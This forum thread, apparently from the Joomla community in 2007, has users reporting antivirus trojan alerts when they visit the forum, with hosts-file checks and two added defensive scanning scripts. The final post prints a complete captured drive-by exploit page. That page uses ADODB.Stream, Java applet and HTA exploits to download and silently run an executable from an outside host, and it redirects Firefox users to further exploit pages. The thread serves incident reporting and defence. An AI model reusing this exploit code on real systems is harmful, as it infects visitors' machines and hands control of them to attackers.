VBS/Psyme When Entering Joomla Forum
McAfee virus scanner picked up this yesterday when I visited this site:
An item was detected and removed the script from running on your computer:
VBS/Psyme
I wasn't sure why that happened, so I had McAfee scan the entire computer and I ran Ad Aware and Spybot. This particular combination never failed me before. Everything was clean.
I came back tonight and got the same message. Anyone else picking this up?
Basically, I went to Google, typed in Joomla then clicked on Forum. (<-- Yes, I know this is a lazy way)
- PhilD
- Joomla! Apprentice
- Posts: 5
- Joined: Sat Oct 21, 2006 10:20 pm
- Location: Wisconsin USA
- Contact:
Re: VBS/Psyme When Entering Joomla Forum
Well no, I was on quite a bit tonight. I tried your method of getting to the forum (sometimes I am lazy also) and no problem. The only problem I have seen today with the Joomla site is the help site; there are database errors and you can't get to any of the FAQs. I think someone already made note of it though.
You probably already read this but the McAfee website says this about VBS/Psyme. The link to the full page is: http://vil.nai.com/vil/content/v_100749.htm
The Method of Infection -
Trojans do not self-replicate. They are spread manually, often under the premise that the executable is something beneficial. Distribution channels include IRC, peer-to-peer networks, newsgroup postings, email, etc.
Phil
Re: VBS/Psyme When Entering Joomla Forum
I think there was a problem in Joomla Forum... maybe hacked??? it was down for several minutes yesterday.
When I visited this site, I saw that Firefox was trying to open a URL from "superadultsex.net"... then... Firefox hung
I would like to read any comment from Joomla moderators/experts about this topic... we can be talking about a security bug in Joomla
Regards
Re: VBS/Psyme When Entering Joomla Forum
>>When I visited this site, I saw that Firefox was trying to open an url from "superadultsex.net"... then... Firefox hung
I can't say that I was also redirected to this same website, but I do know when I was hitting the back button on my browser after getting this warning (to see if I could replicate the problem) I was seeing a URL for a similar site (although I could not get there). It looks like my browser was trying to be redirected somehow but it wasn't working.
- Johan
- Joomla! Apprentice
- Posts: 5
- Joined: Wed Aug 24, 2005 3:48 pm
- Location: Göteborg/Sweden
- Contact:
Re: VBS/Psyme When Entering Joomla Forum
Hi
Me too. I have been warned by two different antivirus programs (Norton and Avast) on different computers when entering http://forum.joomla.org
Avast Log:
Code: Select all
2007-12-21 19:23:48 SYSTEM 1648 Sign of "Java:ClassLoader-D [Trj]" has been found in "http://xxxxxx.xxx/los/java.php\Dex.class" file.
Regards
Re: VBS/Psyme When Entering Joomla Forum
me too, from Antivir...
Re: VBS/Psyme When Entering Joomla Forum
I can confirm this, it only happens when entering forum.joomla.org, and I have noticed this for at least the past two weeks.
- Johan
- Joomla! Apprentice
- Posts: 5
- Joined: Wed Aug 24, 2005 3:48 pm
- Location: Göteborg/Sweden
- Contact:
Re: VBS/Psyme When Entering Joomla Forum
Some moderator or admin should look into this and please give a reply to this post a.s.a.p. This sends no good feelings to the community...
This is a similar topic at this board.!! Trojan Downloader
By the way,
Merry Christmas to you all
Last edited by Johan on Mon Dec 24, 2007 11:05 am, edited 1 time in total.
Re: VBS/Psyme When Entering Joomla Forum
Moving to Sites & Infrastructure forum.
Antonie de Wilde - Forum admin
- brad
- Joomla! Hero
- Posts: 2212
- Joined: Fri Aug 12, 2005 12:38 am
- Skype: tested
- Location: Sydney - Australia
- Contact:
Re: VBS/Psyme When Entering Joomla Forum
I'm keen to help guys, but I have been unable to replicate this myself. Can you find anything in the page source?
Brad Baker - Joomla! Core Team, Sites & Infrastructure.
http://www.rochen.com - Managed Dedicated, Reseller & Multiple Domain Hosting.
http://www.joomlatutorials.com <-- Joomla! 1.5 & 1.0.x
^New Joomla 1.5 Tutorials are out!
-
- Joomla! Fledgling
- Posts: 3
- Joined: Mon Dec 24, 2007 10:35 pm
Re: VBS/Psyme When Entering Joomla Forum
Happened to me just a few minutes ago. I clicked the link to "beginners guide to joomla" in my website admin panel (which takes me to this forum) and my AVG went off with a js/Psyme virus warning. It would not let me "heal" but let it "send to vault" and then I deleted it. I am running a scan on my computer now. Must be an exploit via a forum post or something.
- brad
- Joomla! Hero
- Posts: 2212
- Joined: Fri Aug 12, 2005 12:38 am
- Skype: tested
- Location: Sydney - Australia
- Contact:
Re: VBS/Psyme When Entering Joomla Forum
What was the exact link/post that you were taken to?
Brad Baker - Joomla! Core Team, Sites & Infrastructure.
http://www.rochen.com - Managed Dedicated, Reseller & Multiple Domain Hosting.
http://www.joomlatutorials.com <-- Joomla! 1.5 & 1.0.x
^New Joomla 1.5 Tutorials are out!
-
- Joomla! Fledgling
- Posts: 3
- Joined: Mon Dec 24, 2007 10:35 pm
Re: VBS/Psyme When Entering Joomla Forum
I only remember seeing forum.joomla.org; I don't remember the rest of the link as IE locked up on me when AVG went off with the warning. I had to Ctrl+Alt+Del out of IE. But it was definitely this domain that showed in the address bar.
- PhilD
- Joomla! Apprentice
- Posts: 5
- Joined: Sat Oct 21, 2006 10:20 pm
- Location: Wisconsin USA
- Contact:
Re: VBS/Psyme When Entering Joomla Forum
I want to say that I don't doubt that some members are having problems so please don't think this is any kind of attack on anyone who says there is a problem.
For the record, I am not having any problems nor can I figure a way to create any.
If there is a problem then I think there is going to be a need to give more information, such as what browser you were using, how you accessed the forum or help, what version of Joomla you're using, etc., in order that the problem may be replicated.
I realize that when something unexpected happens, you don't always remember full details, but more information in this case might help.
Something like what is listed below:
I am using the following setup on my computer when I access the forum and help center:
Firefox version 2.0.0.11
Norton Internet Security 10.0.3.3 Latest definitions as of today.
A full scan of the computer was done at 5 am this morning. No problems were found.
I am using Joomla 1.0.12 on one site and 1.0.13 on the other two sites.
default Joomla .htaccess file used on all sites. - no problems.
I access the forum and help site through the following ways:
From an emailed forum response to my posting link. -- no problems.
By following the link that I have in my bookmarks to the Joomla main site, then selecting Forum or Help from the menu to get to the forum or the help site. -- no problems
By typing Joomla into Google and then following the link to the forum. - no problems
By typing Joomla into Google and then following the link to Joomla, then clicking on - no problems.
I just tried access to the help site from the Joomla admin screen/help. This took me to the correct Joomla Help -- No problems.
Once in the forums I generally move around to various boards by following the forum links, either from the site itself or through a link in a post that interests me this includes opening extra tabs when I want-- No problems
I also received a message today from one of the people (Phil Taylor) that developed a component I use that says in part "the modules provided by mosDirectory v2.3.2 are vulnerable to a remote file inclusion" and suggesting an upgrade to the latest version (2.4.0) as it was possible for the injection to happen. Although he had no reports of it happening, all previous versions were affected. The default .htaccess file that ships with Joomla, when enabled, will prevent the injection. I can supply the complete email to anyone who wants it.
I have noticed several things with restorator's posts (I'm not picking on you either by the way). He used IE to access his websites admin area, while there he clicked on Help, then selected "beginners guide to Joomla" His antivirus and IE went nuts when he did that.
I can not find "beginners guide to Joomla" in my help section anywhere, at least not in the 1.0.12 version I checked. The help section is the default setup Joomla did when I installed the site. I have not changed it.
Could there be a possibility, that some users sites are having an exploit done to their sites and the actual exploit is happening from their end?
Phil
- brad
- Joomla! Hero
- Posts: 2212
- Joined: Fri Aug 12, 2005 12:38 am
- Skype: tested
- Location: Sydney - Australia
- Contact:
Re: VBS/Psyme When Entering Joomla Forum
I've checked and rechecked this forum and am not able to locate any malicious code. As I posted above, if anyone else has further information, please let me know.
Brad Baker - Joomla! Core Team, Sites & Infrastructure.
http://www.rochen.com - Managed Dedicated, Reseller & Multiple Domain Hosting.
http://www.joomlatutorials.com <-- Joomla! 1.5 & 1.0.x
^New Joomla 1.5 Tutorials are out!
Re: VBS/Psyme When Entering Joomla Forum
Specs:
IE6.0
McAfee VirusScan Enterprise + Anti-Spyware ver. 8.0i. Latest update: Dec 19
I currently don't run any Joomla Websites, and I don't have any Joomla-related files on my computer (it's a laptop at work)
Access has been by manually typing forum.joomla.org in IE, and then selecting IE's suggestion.
In total I have encountered this problem 3-4 times for the past two weeks. It only happens on forum.joomla.org, not on any other site, and it hasn't been every time I visit forum.joomla.org.
I will get hold of a page source if I get this problem again.
PhilD -> I, for one, don't read your posting as knocking on anybody; your points are valid, and I will try and get hold of more information if I encounter the problem again. Actually I'm just happy that this problem gets some kind of attention, although it is difficult to replicate, because it may be a safety concern.
- brad
- Joomla! Hero
- Posts: 2212
- Joined: Fri Aug 12, 2005 12:38 am
- Skype: tested
- Location: Sydney - Australia
- Contact:
Re: VBS/Psyme When Entering Joomla Forum
Brad Baker - Joomla! Core Team, Sites & Infrastructure.
http://www.rochen.com - Managed Dedicated, Reseller & Multiple Domain Hosting.
http://www.joomlatutorials.com <-- Joomla! 1.5 & 1.0.x
^New Joomla 1.5 Tutorials are out!
Re: VBS/Psyme When Entering Joomla Forum
I started this thread and I have not been able to replicate the problem myself since that time. I know it happened twice - and on two different days. I can still see the events in McAfee. I did look through the code very quickly the second time it happened and I did not see anything that looked unusual.
I heard about the Google problem and I was wondering if that was it too.
- PhilD
- Joomla! Apprentice
- Posts: 5
- Joined: Sat Oct 21, 2006 10:20 pm
- Location: Wisconsin USA
- Contact:
Re: VBS/Psyme When Entering Joomla Forum
Interesting reading.
For those interested here is the link to the BitDefender report with detail
http://www.bitdefender.com/VIRUS-1000239-en--Trojan.Qhost.WU.html
Appears to affect Google's AdSense by placing a redirect in a user's hosts file when they click on an infected ad on Google or on a regular website with Google AdSense ads.
You can check your hosts file by running this ping command from the command line in Windows:
To check if you are affected, you should issue the following command (from the command line or from Start -> Run):
ping -t pagead2.googlesyndication.com
(use Ctrl+Break to stop the ping, or Ctrl+C to stop the ping and exit)
The response should look similar to this:
Pinging pagead.l.google.com [6x.xxx.xxx.xxx] with 32 bytes of data:
where the x's represent digits. If you are not infected, the first digit will be a 6 (as in the example). If you are infected, the first digit will be a 9.
I think that google may have changed server ip addresses as I was getting 74.125.47.164 returned on the ping which is in a google server range of 74.125.0.0 - 74.125.255.255 according to a whois result.
You can check your hosts file for a redirect by opening the windows host file located in
C:\WINDOWS\system32\drivers\etc in a text editor.
If you see entries that you or Spybot S&D did not put there such as:
... ebay.com
Where ... is some set of four numbers, you should probably REMOVE this entry as spyware is trying to redirect your access from ebay.com to another website. The same would go for being redirected to any site from your hosts file, if it looks fishy then get rid of it.
A visual inspection on my hosts file showed just the localhost line.
Please make a backup of your hosts file before trying to edit it.
Spybot S&D if you use that can also lock your hosts file and if it is locked you may not be able to edit it until you unlock it.
This information was gathered from a number of sources and from my own computer. Your mileage may vary.
Sources of information:
Google search
http://www.news.com.au/technology/story/0,25642,22959118-5014111,00.html (News.com.au)
http://www.webpronews.com/topnews/2007/12/19/trojaned-google-ads-attacked (Web Pro News)
http://www.bitdefender.com/VIRUS-1000239-en--Trojan.Qhost.WU.html (BitDefender)
http://whois.domaintools.com/74.125.47.165 (Whois result for ip address returned by ping on my computer)
Windows path to hosts file C:\WINDOWS\system32\drivers\etc (Looked up on my computer Win XP system, may be different location on other versions of windows)
mijji, I just thought my previous posting came across a little rough in tone and did not want it taken the wrong way by anyone.
Phil
Re: VBS/Psyme When Entering Joomla Forum
This happened 2 times to me today from 2 different computers. It happened upon entering the forum root of the site. I was thinking of an advertisement maybe, but there seems to be none on the site.
- PhilD
- Joomla! Apprentice
- Posts: 5
- Joined: Sat Oct 21, 2006 10:20 pm
- Location: Wisconsin USA
- Contact:
Re: VBS/Psyme When Entering Joomla Forum
I don't think it necessarily has anything to do with the Joomla site, or the Joomla forum, other than the fact that the sites may use some of Google's products for ads and stats. From the research I gathered, it is a Google compromise, is considered a low threat and was designed to take ad money away from Google. I suspect it may also affect Google Analytics in some way (have no proof) which I think the forum and Joomla site may use for stats. Google places many ads on their search results pages. Some you may not even realize are ads, but think are search results (I'm not talking about the right side which are obvious ads). Many other websites you may visit may have the trojan embedded in an ad and not know it. Clicking on any of the ads either on the Google site or another website can apparently infect your computer's hosts file. You may not know if you were infected if you were infected before your anti-virus program was updated to identify and catch the trojan. Once infected, your computer will always try to connect to the rogue site anytime there is a trigger present (something that Google handles) on a web page you are viewing.
I would suggest you ask Google, how this was allowed to happen, and what they are going to do about it, how they are going to prevent this in the future, and what they are going to do about customers, and visitors who were infected.
Phil
- Johan
- Joomla! Apprentice
- Posts: 5
- Joined: Wed Aug 24, 2005 3:48 pm
- Location: Göteborg/Sweden
- Contact:
Re: VBS/Psyme When Entering Joomla Forum
Hi
I will come back with a deeper report of what's happened to me and if it happens again. Browser, OS, time, and so on will follow.
About the Google thing, I'm not sure what to say to Google about this.
I'm running my Joomla site with Google AdSense and I think it's my own responsibility since I'm the one displaying Google AdSense. If this Google thing gets confirmed, then will I save my users from malware by removing Google AdSense? None of my users (3000) reported any similar happening there.
It's always a big problem finding the fault when it occurs randomly. Thanks for looking into this since it only occurred (for me) when surfing forum.joomla.org
//johan
-
- Joomla! Fledgling
- Posts: 3
- Joined: Mon Dec 24, 2007 10:35 pm
Re: VBS/Psyme When Entering Joomla Forum
I just wanted to add that this has not yet happened again yet, and the link I followed to "beginners guide" is not after clicking help in 1.0 but within the main administration page of 1.5 rc4 there is a link to "beginners guide".
I am playing with Joomla 1.5 RC4 on a site that is not yet live (and on an intranet not visible to the world) on my home computer, so I really doubt that I have been hacked into. Also the computer is a fresh install of Windows, a WAMP server and Joomla within the past two days. So it's highly unlikely (although not impossible) that it is anything on my computer.
I would hazard a guess that the "virus" is a particular banner ad that comes up every so many rotations and is using a script to download the trojan. Pretty simple idea and a nightmare for an admin to track down, finding which one out of tons in the rotation is linking to an external site AND executing a script. Would not be very hard to do for anyone with only a basic knowledge of HTML. Can you strip any JavaScript from any banners to stop this kind of thing, assuming that's the problem?
P.S.
I am playing with Joomla as it has some nice templates available. I was always a fan of PostNuke but the templates easily available are horrible and the backwards compatibility is an issue, not to mention the next release seems to be eons away and will likely break modules again. I fear that PostNuke may be a dying thing so I am looking to the more current popular options. But security as well as varied user permissions are some of my requirements. So this episode is not helping my decision as we can not yet be sure if it's a Joomla problem, a BBS problem (which there are always tons of issues with) or a banner problem. I will contribute what I can to help you, but that's all the info I have at this time.
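Brad asked earlier for anything unusual in the page source, and the guess above is a banner in the rotation carrying a script or frame; the report at the end of this thread describes exactly that, a hidden iframe plus a loader script pulling an ADODB.Stream exploit page. As an added example (not code from the thread, from Joomla or from phpBB), the following scans a saved copy of a page's source for those markers: iframes hidden by zero size or display:none, script and frame sources on hosts outside a trusted list, ActiveX/applet objects, IE-only behaviour tags, and the exploit strings inside inline script or style. The sample page, the attacker.invalid host and the trusted-host list are constructed assumptions.

```python
"""Scan saved page source for drive-by markers: hidden iframes, scripts and
frames from untrusted hosts, ActiveX objects, and the ADODB.Stream / RDS /
clientCaps strings used by the IE exploit chain described in the thread.

Added example for this thread, not Joomla or phpBB code. SAMPLE_PAGE is
constructed (attacker.invalid is a reserved name); TRUSTED_HOSTS is an
assumption for forum.joomla.org and needs extending for any real site.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

TRUSTED_HOSTS = {"forum.joomla.org", "www.joomla.org"}  # assumed

# Strings characteristic of the 2007-era IE drive-by kits.
SUSPECT_STRINGS = ("ADODB.Stream", "RDS.DataSpace", "#default#clientcaps", "Shell.Application")

# Constructed sample: one legitimate script, then the kind of injected
# markup the posters report (hidden frame, foreign loader, exploit script).
SAMPLE_PAGE = r"""<html><head><title>Joomla! Forum</title>
<script src="http://forum.joomla.org/styles/prosilver/template/forum_fn.js"></script>
<style type="text/css">IE\:clientCaps {behavior:url(#default#clientcaps)}</style>
<IE:clientCaps ID="oClientCaps" />
</head><body>
<div id="banner"><img src="/images/banner.gif"></div>
<iframe src="http://xxxxxx.xxx/los/java.php" width="0" height="0" style="display:none"></iframe>
<script src="http://attacker.invalid/setup.php?aff_id=0"></script>
<script type="text/javascript">
var s = new ActiveXObject("ADODB.Stream");
</script>
</body></html>"""


class DriveByScanner(HTMLParser):
    """Collect (kind, detail) findings while walking the markup."""

    def __init__(self, trusted):
        super().__init__()
        self.trusted = trusted
        self.findings = []
        self._buf_tag = None   # "script" or "style" while inside one
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            self._check_iframe(a)
        elif tag in ("script", "style"):
            self._buf_tag, self._buf = tag, []
            if tag == "script" and a.get("src"):
                self._check_src("script", a["src"])
        elif tag in ("object", "embed", "applet"):
            self.findings.append(("activex-or-applet",
                                  a.get("classid") or a.get("src") or a.get("code") or ""))
        elif tag.startswith("ie:"):
            # IE-only binary behaviours such as clientCaps fingerprint the
            # browser so the kit can pick a matching exploit.
            self.findings.append(("ie-behavior-tag", tag))

    def handle_endtag(self, tag):
        if tag == self._buf_tag:
            body = "".join(self._buf).lower()
            for s in SUSPECT_STRINGS:
                if s.lower() in body:
                    self.findings.append((f"inline-{tag}", s))
            self._buf_tag, self._buf = None, []

    def handle_data(self, data):
        if self._buf_tag:
            self._buf.append(data)

    def _check_iframe(self, a):
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = "display:none" in style or "visibility:hidden" in style
        for dim in ("width", "height"):
            if re.fullmatch(r"0+(px)?", (a.get(dim) or "").strip()):
                hidden = True
        src = a.get("src") or ""
        if hidden:
            self.findings.append(("hidden-iframe", src))
        else:
            self._check_src("iframe", src)

    def _check_src(self, kind, src):
        host = urlparse(src).hostname
        if host and host.lower() not in self.trusted:
            self.findings.append((f"third-party-{kind}", src))


def scan(html, page_host="forum.joomla.org"):
    """Return the list of (kind, detail) findings for one page's source."""
    parser = DriveByScanner(TRUSTED_HOSTS | {page_host})
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for kind, detail in scan(SAMPLE_PAGE):
        print(f"{kind:20} {detail}")
```

Save the page with the browser's "view source" (or fetch it with a non-browser client from a throwaway VM, since the injected frame was only served intermittently) and pass the text to scan(); a clean forum page returns an empty list. Matching on string constants is only as good as the list, so treat the output as a triage aid, not a verdict.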
Trojan loaded with Joomla forum!!!
PLEASE CHECK FORUM SECURITY BECAUSE IFRAME TROJAN IS LOADED WITH FORUM LOAD!
Re: Trojan loaded with Joomla forum!!!
Thanks! ;)
The pages which normally contain advertisement from Google either don't display the advertisement or display advertisement from an other source (not Google)
The "hosts" file, used to provide local storage for domain name / IP mappings, contains a line redirecting the host "pagead2.googlesyndication.com"
To check if you are affected, you should issue the following command (from the command line or from Start -> Run):
ping -t pagead2.googlesyndication.com
The response should look similar to this:
Pinging pagead.l.google.com [6x.xxx.xxx.xxx] with 32 bytes of data:
where the x's represent digits. If you are not infected, the first digit will be a 6 (as in the example). If you are infected, the first digit will be a 9.
Last edited by mgnapg on Sat Dec 29, 2007 7:33 pm, edited 1 time in total.
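The ping check quoted by PhilD and again just above depends on the first digit of whatever address Google happens to be using that week, which PhilD already noticed had changed. As an added example (not code from the thread or from Joomla), the following reads the hosts file itself and flags what matters: any watched host pinned to an address outside its expected range, and any other non-loopback mapping. SAMPLE_HOSTS, the watched-host list and EXPECTED_NETS are constructed assumptions; the 74.125.0.0/16 range is the whois result quoted in the thread and will go stale.

```python
"""Audit a Windows hosts file for Trojan.Qhost-style hijacks.

Added example for this thread, not code from the Joomla project or from any
poster. SAMPLE_HOSTS is constructed; the 203.0.113.0/24 addresses in it are a
reserved documentation range. EXPECTED_NETS is an assumption taken from the
whois result quoted in the thread (74.125.0.0/16) and will go stale, so
refresh it before relying on it.
"""
import ipaddress
import re
import sys

# Constructed sample: the stock localhost line, a Spybot-style block entry,
# one Qhost-style hijack of Google's ad server, an ebay redirect and one
# ordinary internal mapping.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
127.0.0.1       ad.doubleclick.net      # added by Spybot S&D
203.0.113.5     pagead2.googlesyndication.com
203.0.113.5     ebay.com www.ebay.com
10.0.0.5        wiki.corp.example
"""

# Hosts that a Qhost-style trojan is known to redirect (assumed list).
WATCHED = {
    "pagead2.googlesyndication.com",
    "www.google-analytics.com",
    "ebay.com",
    "www.ebay.com",
}

# Where a watched host is allowed to point if it is pinned at all (assumed).
EXPECTED_NETS = {
    "pagead2.googlesyndication.com": [ipaddress.ip_network("74.125.0.0/16")],
}


def parse_hosts(text):
    """Yield (ip, hostname, lineno) for every mapping in a hosts file.

    Handles comments, blank lines and several hostnames on one line;
    lines whose first field is not an IP address are skipped.
    """
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = re.split(r"\s+", line)
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue
        for host in fields[1:]:
            yield str(ip), host.lower(), lineno


def classify(ip_str, host):
    """Verdict for one mapping: block, pinned-expected, HIJACK or redirect."""
    ip = ipaddress.ip_address(ip_str)
    if ip.is_loopback or ip.is_unspecified:
        # 127.0.0.1 / 0.0.0.0 only blocks a host; that is what ad blockers
        # and Spybot's immunisation write, and it cannot send you elsewhere.
        return "block"
    nets = EXPECTED_NETS.get(host)
    if nets is not None:
        return "pinned-expected" if any(ip in n for n in nets) else "HIJACK"
    if host in WATCHED:
        return "HIJACK"
    return "redirect"  # any other non-loopback mapping deserves a look


def audit(text):
    """Return (lineno, ip, host, verdict) for every entry that is not a block."""
    findings = []
    for ip_str, host, lineno in parse_hosts(text):
        verdict = classify(ip_str, host)
        if verdict != "block":
            findings.append((lineno, ip_str, host, verdict))
    return findings


if __name__ == "__main__":
    # Pass the real file, e.g. C:\WINDOWS\system32\drivers\etc\hosts, as argv[1].
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_HOSTS
    for lineno, ip_str, host, verdict in audit(text):
        print(f"line {lineno}: {host} -> {ip_str}: {verdict}")
```

Run it with no argument to see the sample, or pass C:\WINDOWS\system32\drivers\etc\hosts as the first argument on the machine you are checking. Loopback entries are reported as blocks and skipped, since that is what Spybot S&D's immunisation writes and it cannot redirect anything; the entry a Qhost infection leaves is a watched host pointing at a public address, which is what HIJACK marks.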
Re: Trojan loaded with Joomla forum!!!
Moderator note: Topic moved from 1.5 General Question to Sites & Infrastructure.
Gergo Erdosi
Re: Trojan loaded with Joomla forum!!!
Hi there,
Sad to pick this topic up again, but it has happened to me several times now that I get bombed by trojans when entering the forum. I tried to analyse it a bit.
This is the code which seems to be hidden somewhere on the page:
Sadly I haven't been able to locate it yet; it only seems to happen sometimes. It might be that it comes from the Google ads, I can't say for sure.
Other malicious code is loaded from:
http://void.theoron.com/setup.php?aff_id=5068&type=1
I can't say for sure yet if the iframe above loads that page, but it happens at the same time.
The code it loads is quite hazardous and tries to exploit a common Windows security problem (the ADODB Stream hack):
Code:
<HTML xmlns:IE>
<HEAD>
<STYLE type='text/css'>
IE\:clientCaps {behavior:url(#default#clientcaps)}
</STYLE>
</HEAD>
<IE:clientCaps ID="oClientCaps" />
<script type="text/javascript" language="JavaScript">
function GetVersion(CLSID)
{
if (oClientCaps.isComponentInstalled(CLSID,"ComponentID")){return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");}
else {return Array(0,0,0,0);}
}
function Get_Win_Version(IE_vers)
{
if (IE_vers.indexOf('Windows 95') != -1) return "95"
else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
else if (IE_vers.indexOf('Windows 98') != -1) return "98"
else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
}
function MS06014CreateO(o, n) {
var r = null;
try { eval('r = o.CreateObject(n)') }catch(e){}
if (! r) {try { eval('r = o.CreateObject(n, "")') }catch(e){}}
if (! r) {try { eval('r = o.CreateObject(n, "", "")') }catch(e){}}
if (! r) {try { eval('r = o.GetObject("", n)') }catch(e){}}
if (! r) {try { eval('r = o.GetObject(n, "")') }catch(e){}}
if (! r) {try { eval('r = o.GetObject(n)') }catch(e){}}
return(r);
}
function MS06014Go(a) {
var s = MS06014CreateO(a, "WScript.Shell");
var o = MS06014CreateO(a, "ADODB.Stream");
var e = s.Environment("Process");
var url = 'http://void.theoreon.com/exe.php?ex=5068';
var xml = null;
var bin = e.Item("TEMP") + "mbroit.exe";
var dat;
try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
catch(e) {
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}
if (! xml) return(0);
xml.open("GET", url, false)
xml.send(null);
dat = xml.responseBody;
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(dat);
o.SaveToFile(bin, 2);
s.Run(bin,0);
}
function MS06014Exploit() {
var i = 0;
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);
while (t[i]) {
var a = null;
if (t[i].substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} else {
try { a = new ActiveXObject(t[i]); } catch(e){}
}
if (a) {
try {
var b = MS06014CreateO(a, "WScript.Shell");
if (b) {
MS06014Go(a);
return(1);
}
} catch(e){}
}
i++;
}
return(0);
}
function pass2()
{
try {
var unsafeclass = document.maniman.getClass().forName("sun.misc.Unsafe");
var unsafemeth = unsafeclass.getMethod("getUnsafe", null);
var unsafe = unsafemeth.invoke(unsafemeth, null);
document.maniman.foobar(unsafe);
var chenref = unsafe.defineClass("omfg", document.maniman.luokka, 0, document.maniman.classSize);
var chen = unsafe.allocateInstance(chenref);
chen.setURLdl("http://void.theoreon.com/exe.php?ex=5068");
chen.setUname("558");
chen.setCID("other");
return chen.perse(unsafe);
} catch (d) {return -1;}
return -1;
}
function pass3(){
document.write("<applet archive=OP.jar code=OP.class width=1 height=1 MAYSCRIPT>");
document.write("<param name=usid value=us0105>");
document.write("<param name=linkurl value="http://void.theoreon.com/exe.php?ex=5068"></applet>");
return 1;
}
function Negcash(){
document.write("<applet code=animan.class name=maniman height=1 width=1 MAYSCRIPT></applet>");
if (pass2() != 1) {
pass3();
}
}
function ExploitMS03011(){
document.write("<applet archive="ms03011.jar" code="MagicApplet.class" width=1 height=1>");
document.write("<param name="ModulePath" value="http://void.theoreon.com/exe.php?ex=5068"></applet>");
}
function MS05001Exploit() {
document.write("<OBJECT id="hhctrl_HTML_Opener" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" style="display:none"> <PARAM name="Command" value="Related Topics, MENU"><PARAM name="Button" value="Text:Just a button"><PARAM name="Window" value="$global_blank"><PARAM name="Item1" value="command;ms-its:addremov.chm::/win_addprog_window_component.htm"></OBJECT>");
document.write("<textarea id="ObjMaker" cols=10 rows=10 style="display:none"><OBJECT id="hhctrl_JS_Runner" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" style="display:none"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Button" value="Text:Just a button"><PARAM name="Window" value="$global_blank"></textarea>");
document.write("<OBJECT id="DHTML_Edit" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width=10 height=10 align="middle"><PARAM NAME="ActivateApplets" VALUE="1"><PARAM NAME="ActivateActiveXControls" VALUE="1"></OBJECT> ");
document.write("<DIV id="ObjectContainer"></DIV>");
HTA_URL="http://void.theoreon.com/";
var Obj_body=document.all.ObjMaker.innerText;
HTA_location='",ms'+'hta,'+HTA_URL+'exp/ms05001.hta'+'"';
Init_HTA='var alink=document.links[0].href%3Baparams=alink.split(" ")%3Bchmpath=aparams[0].split(",")%3Bnlink=chmpath[0]+'+HTA_location+'+" "+aparams[1]+" "+aparams[2]+" "+aparams[3]%3Bdocument.links[0].href=nlink%3Bdocument.links[0].click();';
Obj_Last_Param="\r\n\<PARAM name="Item1" value='command;javascript:"+Init_HTA+"'>";
document.all.ObjMaker.innerText=Obj_body+Obj_Last_Param+'</OBJECT>';
ObjectContainer.innerHTML=document.all.ObjMaker.value;
hhctrl_HTML_Opener.HHClick();
setTimeout("hhctrl_JS_Runner.HHClick()",500);
setTimeout("self.focus()",1000);
}
function ExploitAll(){
if (navigator.appName=="Microsoft Internet Explorer")
{
var IEversion=navigator.appVersion;
var IEplatform=navigator.platform;
if (IEplatform.search("Win32") != -1)
{
var WinOS=Get_Win_Version(IEversion);
FullVersion=clientInformation.appMinorVersion;
PatchList=FullVersion.split(";");
var JVM_vers = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}");
var XP_SP2_patched=0;
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{
ExploitMS03011();
}
if(MS06014Exploit() != 1){
Negcash();
for (var i=0; i < PatchList.length; i++){
if (PatchList[i]=="SP2"){
XP_SP2_patched=1;
}
}
if(XP_SP2_patched==0){
MS05001Exploit();
}
}
}
}
else if (navigator.appName=="Netscape")
{
j=navigator.userAgent.indexOf('Firefox');
if (j != -1)
{
j=j+"Firefox/".length;
var FF_name=navigator.userAgent.substr(j);
k=FF_name.indexOf(" ");
if (k != -1)
{
FF_name=FF_name.substr(0,k);
}
FF_vers=FF_name.split(".");
if (FF_vers[2] == undefined)
{
FF_vers[2]=0;
}
if (FF_vers[0]==0){
window.location="http://void.theoreon.com/exp/mfsa200550.php";
}else if (FF_vers[0] == 1){
if ((FF_vers[1]==0)&&(FF_vers[2]<5)) {
window.location="http://void.theoreon.com/exp/mfsa200550.php";
}else{
window.location="http://void.theoreon.com/exp/ms06006.php";
}
}
}
}
}
</script>
<body onload='ExploitAll()'>
</BODY>
</HTML>
It then tries to fire up the "Microsoft Remote Data Services" ActiveX control.
